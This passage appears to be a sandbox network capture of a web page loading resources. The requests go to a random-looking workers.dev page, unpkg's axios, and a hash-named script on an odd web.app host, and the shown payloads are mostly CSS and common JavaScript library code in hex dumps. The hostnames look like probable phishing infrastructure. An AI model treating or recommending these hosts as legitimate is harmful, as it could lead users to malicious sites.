2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 34 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 34 34 70 78 7d 2e 52 58 66 62 32 32 62 63 37 64 66 62 32 32 62 63 37 64 59 65 52 4c 58 2e 74 69 6c 65 20 2e 63 6f 6e 74 65 6e 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 7d 2e 52 58 66 62 32 32 62 63 37 64 66 62 32 32 62 63 37 64 59 65 52 4c 58 2e 74 69 6c 65 20 2e 63 6f 6e 74 65 6e 74 3e 2a 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 52 58 66 62 32 32 62 63 37 64 66 62 32 32 62 63 37 64 59 65 52 4c 58 2e 74 69 6c 65 Data Ascii: sor:pointer;outline:none;color:inherit;display:block;margin-left:-44px;margin-right:-44px}.RXfb22bc7dfb22bc7dYeRLX.tile .content{line-height:16px;padding-left:12px}.RXfb22bc7dfb22bc7dYeRLX.tile .content>*{word-wrap:break-word}.RXfb22bc7dfb22bc7dYeRLX.tile
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 41 63 30 35 39 66 63 61 38 63 30 35 39 66 63 61 38 42 45 68 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 Data Ascii: xt-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.Ac059fca8c059fca8BEh,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px;padding-bottom:2.3632px;padding-top:2.363
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 36 2c 2e 63 6f 6c 2d 6c 67 2d 31 37 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 33 2c 2e 63 6f 6c 2d 6c 67 2d 32 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 63 6f 6c 2d 6c 67 2d 31 7b 77 69 64 74 68 3a 34 2e 31 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 32 7b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6c 67 2d 33 7b 77 69 64 74 68 3a 31 32 2e 35 25 7d 2e 63 6f 6c 2d 6c 67 2d 34 7b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 35 7b 77 69 64 74 68 3a 32 30 2e 38 33 33 33 33 25 7d 2e 63 6f 6c 2d 6c 67 2d 36 7b 77 69 64 74 68 3a 32 35 25 7d 2e 63 6f 6c 2d 6c 67 2d 37 7b Data Ascii: 6,.col-lg-17,.col-lg-18,.col-lg-19,.col-lg-20,.col-lg-21,.col-lg-22,.col-lg-23,.col-lg-24{float:left}.col-lg-1{width:4.16667%}.col-lg-2{width:8.33333%}.col-lg-3{width:12.5%}.col-lg-4{width:16.66667%}.col-lg-5{width:20.83333%}.col-lg-6{width:25%}.col-lg-7{

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:42 UTC	557	OUT	GET /axios@0.16.1/dist/axios.min.js HTTP/1.1 Host: unpkg.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:42 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:42 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close access-control-allow-origin: * cache-control: public, max-age=31536000 last-modified: Sat, 08 Apr 2017 18:51:20 GMT etag: W/"879a-StlLhYX39Pj2Qvz0O98NQPjvG9U" via: 1.1 fly.io fly-request-id: 01HEQKACERGQPF9RTTAV3ZCDJ2-iad CF-Cache-Status: HIT Age: 8021801 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 852b5180ca1353f8-ATL
2024-02-09 10:09:42 UTC	793	IN	Data Raw: 37 64 35 66 0d 0a 2f 2a 20 61 78 69 6f 73 20 76 30 2e 31 36 2e 31 20 7c 20 28 63 29 20 32 30 31 37 20 62 79 20 4d 61 74 74 20 5a 61 62 72 69 73 6b 69 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 61 78 69 6f 73 3d 65 28 29 3a 74 2e 61 78 69 6f 73 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 Data Ascii: 7d5f/* axios v0.16.1 \| (c) 2017 by Matt Zabriskie */!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.axios=e():t.axios=e()}(this,func
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 6e 28 74 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 74 29 7d 2c 66 2e 73 70 72 65 61 64 3d 72 28 32 38 29 2c 74 2e 65 78 70 6f 72 74 73 3d 66 2c 74 2e 65 78 70 6f 72 74 73 2e 64 65 66 61 75 6c 74 3d 66 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 5f 2e 63 61 6c 6c 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 69 73 42 75 66 66 65 72 26 26 65 2e 69 73 42 75 66 66 65 72 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 Data Ascii: n(t){return Promise.all(t)},f.spread=r(28),t.exports=f,t.exports.default=f},function(t,e,r){(function(e){"use strict";function n(t){return"[object Array]"===_.call(t)}function o(t){return"undefined"!=typeof e&&e.isBuffer&&e.isBuffer(t)}function i(t){retur
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 6e 20 74 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 69 29 26 26 65 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 74 5b 69 5d 2c 69 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 72 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 5b 72 5d 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 3f 65 5b 72 5d 3d 41 28 65 5b 72 5d 2c 74 29 3a 65 5b 72 5d 3d 74 7d 66 6f 72 28 76 61 72 20 65 3d 7b 7d 2c 72 3d 30 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 45 28 61 72 67 75 6d 65 6e 74 73 5b 72 5d 2c 74 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 62 28 74 2c 65 2c 72 29 7b 72 65 74 75 Data Ascii: n t)Object.prototype.hasOwnProperty.call(t,i)&&e.call(null,t[i],i,t)}function A(){function t(t,r){"object"==typeof e[r]&&"object"==typeof t?e[r]=A(e[r],t):e[r]=t}for(var e={},r=0,n=arguments.length;r<n;r++)E(arguments[r],t);return e}function b(t,e,r){retu
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 66 20 73 29 29 72 65 74 75 72 6e 20 6e 65 77 20 73 28 74 2c 65 2c 72 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 66 20 65 6e 63 6f 64 69 6e 67 20 69 73 20 73 70 65 63 69 66 69 65 64 20 74 68 65 6e 20 74 68 65 20 66 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 22 29 3b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 74 29 7d 72 65 74 75 72 6e 20 75 28 74 68 69 73 2c 74 2c 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 65 2c 72 2c 6e 29 7b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 Data Ascii: f s))return new s(t,e,r);if("number"==typeof t){if("string"==typeof e)throw new Error("If encoding is specified then the first argument must be a string");return c(this,t)}return u(this,t,e,r)}function u(t,e,r,n){if("number"==typeof e)throw new TypeError(
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 55 69 6e 74 38 41 72 72 61 79 28 65 2c 72 2c 6e 29 2c 73 2e 54 59 50 45 44 5f 41 52 52 41 59 5f 53 55 50 50 4f 52 54 3f 28 74 3d 65 2c 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 2e 70 72 6f 74 6f 74 79 70 65 29 3a 74 3d 70 28 74 2c 65 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 69 66 28 73 2e 69 73 42 75 66 66 65 72 28 65 29 29 7b 76 61 72 20 72 3d 30 7c 67 28 65 2e 6c 65 6e 67 74 68 29 3b 72 65 74 75 72 6e 20 74 3d 69 28 74 2c 72 29 2c 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 3f 74 3a 28 65 2e 63 6f 70 79 28 74 2c 30 2c 30 2c 72 29 2c 74 29 7d 69 66 28 65 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 26 26 65 2e 62 75 66 66 65 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 42 75 Data Ascii: Uint8Array(e,r,n),s.TYPED_ARRAY_SUPPORT?(t=e,t.__proto__=s.prototype):t=p(t,e),t}function d(t,e){if(s.isBuffer(e)){var r=0\|g(e.length);return t=i(t,r),0===t.length?t:(e.copy(t,0,0,r),t)}if(e){if("undefined"!=typeof ArrayBuffer&&e.buffer instanceof ArrayBu
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 65 74 75 72 6e 22 22 3b 69 66 28 72 3e 3e 3e 3d 30 2c 65 3e 3e 3e 3d 30 2c 72 3c 3d 65 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 74 7c 7c 28 74 3d 22 75 74 66 38 22 29 3b 3b 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 68 65 78 22 3a 72 65 74 75 72 6e 20 4c 28 74 68 69 73 2c 65 2c 72 29 3b 63 61 73 65 22 75 74 66 38 22 3a 63 61 73 65 22 75 74 66 2d 38 22 3a 72 65 74 75 72 6e 20 78 28 74 68 69 73 2c 65 2c 72 29 3b 63 61 73 65 22 61 73 63 69 69 22 3a 72 65 74 75 72 6e 20 43 28 74 68 69 73 2c 65 2c 72 29 3b 63 61 73 65 22 6c 61 74 69 6e 31 22 3a 63 61 73 65 22 62 69 6e 61 72 79 22 3a 72 65 74 75 72 6e 20 49 28 74 68 69 73 2c 65 2c 72 29 3b 63 61 73 65 22 62 61 73 65 36 34 22 3a 72 65 74 75 72 6e 20 50 28 74 68 69 73 2c 65 2c 72 29 3b 63 61 73 65 22 75 63 Data Ascii: eturn"";if(r>>>=0,e>>>=0,r<=e)return"";for(t\|\|(t="utf8");;)switch(t){case"hex":return L(this,e,r);case"utf8":case"utf-8":return x(this,e,r);case"ascii":return C(this,e,r);case"latin1":case"binary":return I(this,e,r);case"base64":return P(this,e,r);case"uc
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 66 28 69 28 74 2c 61 29 3d 3d 3d 69 28 65 2c 63 3d 3d 3d 2d 31 3f 30 3a 61 2d 63 29 29 7b 69 66 28 63 3d 3d 3d 2d 31 26 26 28 63 3d 61 29 2c 61 2d 63 2b 31 3d 3d 3d 66 29 72 65 74 75 72 6e 20 63 2a 73 7d 65 6c 73 65 20 63 21 3d 3d 2d 31 26 26 28 61 2d 3d 61 2d 63 29 2c 63 3d 2d 31 7d 65 6c 73 65 20 66 6f 72 28 72 2b 66 3e 75 26 26 28 72 3d 75 2d 66 29 2c 61 3d 72 3b 61 3e 3d 30 3b 61 2d 2d 29 7b 66 6f 72 28 76 61 72 20 68 3d 21 30 2c 70 3d 30 3b 70 3c 66 3b 70 2b 2b 29 69 66 28 69 28 74 2c 61 2b 70 29 21 3d 3d 69 28 65 2c 70 29 29 7b 68 3d 21 31 3b 62 72 65 61 6b 7d 69 66 28 68 29 72 65 74 75 72 6e 20 61 7d 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 62 28 74 2c 65 2c 72 2c 6e 29 7b 72 3d 4e 75 6d 62 65 72 28 72 29 7c 7c 30 3b 76 61 72 20 6f 3d Data Ascii: f(i(t,a)===i(e,c===-1?0:a-c)){if(c===-1&&(c=a),a-c+1===f)return c*s}else c!==-1&&(a-=a-c),c=-1}else for(r+f>u&&(r=u-f),a=r;a>=0;a--){for(var h=!0,p=0;p<f;p++)if(i(t,a+p)!==i(e,p)){h=!1;break}if(h)return a}return-1}function b(t,e,r,n){r=Number(r)\|\|0;var o=
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 29 2c 73 3d 35 36 33 32 30 7c 31 30 32 33 26 73 29 2c 6e 2e 70 75 73 68 28 73 29 2c 6f 2b 3d 75 7d 72 65 74 75 72 6e 20 55 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 74 29 7b 76 61 72 20 65 3d 74 2e 6c 65 6e 67 74 68 3b 69 66 28 65 3c 3d 74 74 29 72 65 74 75 72 6e 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 53 74 72 69 6e 67 2c 74 29 3b 66 6f 72 28 76 61 72 20 72 3d 22 22 2c 6e 3d 30 3b 6e 3c 65 3b 29 72 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 53 74 72 69 6e 67 2c 74 2e 73 6c 69 63 65 28 6e 2c 6e 2b 3d 74 74 29 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 29 7b 76 61 72 20 6e 3d 22 22 3b 72 3d 4d 61 74 68 2e 6d 69 6e 28 74 2e 6c 65 6e 67 Data Ascii: ),s=56320\|1023&s),n.push(s),o+=u}return U(n)}function U(t){var e=t.length;if(e<=tt)return String.fromCharCode.apply(String,t);for(var r="",n=0;n<e;)r+=String.fromCharCode.apply(String,t.slice(n,n+=tt));return r}function C(t,e,r){var n="";r=Math.min(t.leng
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 67 65 22 29 3b 69 66 28 72 3c 30 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 74 2c 65 2c 72 2c 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 7c 7c 4d 28 74 2c 65 2c 72 2c 34 2c 33 2e 34 30 32 38 32 33 34 36 36 33 38 35 32 38 38 36 65 33 38 2c 2d 33 2e 34 30 32 38 32 33 34 36 36 33 38 35 32 38 38 36 65 33 38 29 2c 51 2e 77 72 69 74 65 28 74 2c 65 2c 72 2c 6e 2c 32 33 2c 34 29 2c 72 2b 34 7d 66 75 6e 63 74 69 6f 6e 20 71 28 74 2c 65 2c 72 2c 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 7c 7c 4d 28 74 2c 65 2c 72 2c 38 2c 31 2e 37 39 37 36 39 33 31 33 34 38 36 32 33 31 35 37 65 33 30 38 2c 2d 31 2e 37 39 37 36 39 33 31 33 34 38 36 32 33 31 35 37 65 33 Data Ascii: ge");if(r<0)throw new RangeError("Index out of range")}function k(t,e,r,n,o){return o\|\|M(t,e,r,4,3.4028234663852886e38,-3.4028234663852886e38),Q.write(t,e,r,n,23,4),r+4}function q(t,e,r,n,o){return o\|\|M(t,e,r,8,1.7976931348623157e308,-1.7976931348623157e3
2024-02-09 10:09:42 UTC	1369	IN	Data Raw: 73 68 28 6f 29 2c 69 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 24 28 74 29 7b 72 65 74 75 72 6e 20 5a 2e 74 6f 42 79 74 65 41 72 72 61 79 28 46 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 74 2c 65 2c 72 2c 6e 29 7b 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 6e 26 26 21 28 6f 2b 72 3e 3d 65 2e 6c 65 6e 67 74 68 7c 7c 6f 3e 3d 74 2e 6c 65 6e 67 74 68 29 3b 2b 2b 6f 29 65 5b 6f 2b 72 5d 3d 74 5b 6f 5d 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 47 28 74 29 7b 72 65 74 75 72 6e 20 74 21 3d 3d 74 7d 76 61 72 20 5a 3d 72 28 34 29 2c 51 3d 72 28 35 29 2c 57 3d 72 28 36 29 3b 65 2e 42 75 66 66 65 72 3d 73 2c 65 2e 53 6c 6f 77 42 75 66 66 65 72 3d 79 2c 65 2e 49 4e 53 50 45 43 54 5f 4d 41 58 5f 42 59 54 45 53 Data Ascii: sh(o),i.push(n);return i}function $(t){return Z.toByteArray(F(t))}function K(t,e,r,n){for(var o=0;o<n&&!(o+r>=e.length\|\|o>=t.length);++o)e[o+r]=t[o];return o}function G(t){return t!==t}var Z=r(4),Q=r(5),W=r(6);e.Buffer=s,e.SlowBuffer=y,e.INSPECT_MAX_BYTES

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:43 UTC	621	OUT	GET /sdxhetfdzzdsdsdxz/themes/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.js HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:43 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 76082 Cache-Control: max-age=3600 Content-Type: text/javascript; charset=utf-8 Etag: "18436deb674b50728be198a9912eab2947b4e3b5a74daafe8daf6805d969d6cf" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:43 GMT X-Served-By: cache-pdk-kfty2130062-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473383.216634,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:43 UTC	16384	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 74 2e 45 53 36 50 72 6f 6d 69 73 65 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 7d 66 75 Data Ascii: !function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):t.ES6Promise=e()}(this,function(){"use strict";function t(t){return"function"==typeof t\|\|"object"==typeof t&&null!==t}fu
2024-02-09 10:09:43 UTC	16384	IN	Data Raw: 28 62 7c 7c 30 29 29 2e 73 6c 69 63 65 28 2d 61 29 7d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 3b 76 61 72 20 62 3d 4c 5b 61 5d 3b 72 65 74 75 72 6e 20 62 3f 62 3a 22 5c 5c 75 30 30 22 2b 78 28 32 2c 61 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 7d 2c 4f 3d 2f 5b 5c 78 30 30 2d 5c 78 31 66 5c 78 32 32 5c 78 35 63 5d 2f 67 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4f 2e 6c 61 73 74 49 6e 64 65 78 3d 30 3b 72 65 74 75 72 6e 27 22 27 2b 28 4f 2e 74 65 73 74 28 61 29 3f 61 2e 72 65 70 6c 61 63 65 28 4f 2c 56 29 3a 61 29 2b 27 22 27 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 67 2c 65 2c 6e 2c 64 2c 68 2c 66 2c 6d 3b 69 66 28 76 29 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 Data Ascii: (b\|\|0)).slice(-a)},V=function(a){a=a.charCodeAt(0);var b=L[a];return b?b:"\\u00"+x(2,a.toString(16))},O=/[\x00-\x1f\x22\x5c]/g,S=function(a){O.lastIndex=0;return'"'+(O.test(a)?a.replace(O,V):a)+'"'},P=function(a){var b,c,g,e,n,d,h,f,m;if(v)b=function(a){c
2024-02-09 10:09:43 UTC	16384	IN	Data Raw: 65 50 72 6f 70 65 72 74 79 28 41 72 72 61 79 2c 22 69 73 41 72 72 61 79 22 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 72 2e 63 61 6c 6c 28 74 29 7d 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 7d 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 29 3b 7d 29 2e 63 61 6c 6c 28 27 6f 62 6a 65 63 74 27 20 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 26 26 77 69 6e 64 6f 77 20 7c 7c 27 6f 62 6a 65 63 74 27 20 3d 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 20 26 26 73 65 6c 66 20 7c 7c 27 6f 62 6a 65 63 74 27 20 3d 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 20 26 26 67 6c 6f 62 61 6c 20 7c 7c 7b Data Ascii: eProperty(Array,"isArray",{configurable:!0,value:function(t){return"[object Array]"===r.call(t)},writable:!0})}(Object.prototype.toString);}).call('object' ===typeof window &&window \|\|'object' ===typeof self &&self \|\|'object' ===typeof global &&global \|\|{
2024-02-09 10:09:43 UTC	16384	IN	Data Raw: 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 73 7c 7c 28 73 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 71 28 29 2c 73 3d 6e 75 6c 6c 7d 2c 72 29 29 7d 7d 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 71 2c 72 2c 73 2c 75 29 7b 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 71 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 71 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 72 2c 73 2c 75 7c 7c 21 31 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 71 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 71 2e 61 74 74 61 63 68 45 76 65 6e 74 28 27 6f 6e 27 2b 72 2c 73 29 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 71 2c 72 2c 73 2c 75 29 7b 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 71 2e 72 65 6d 6f 76 65 Data Ascii: urn function(){s\|\|(s=setTimeout(function(){q(),s=null},r))}},j=function(q,r,s,u){'function'==typeof q.addEventListener?q.addEventListener(r,s,u\|\|!1):'function'==typeof q.attachEvent&&q.attachEvent('on'+r,s)},k=function(q,r,s,u){'function'==typeof q.remove
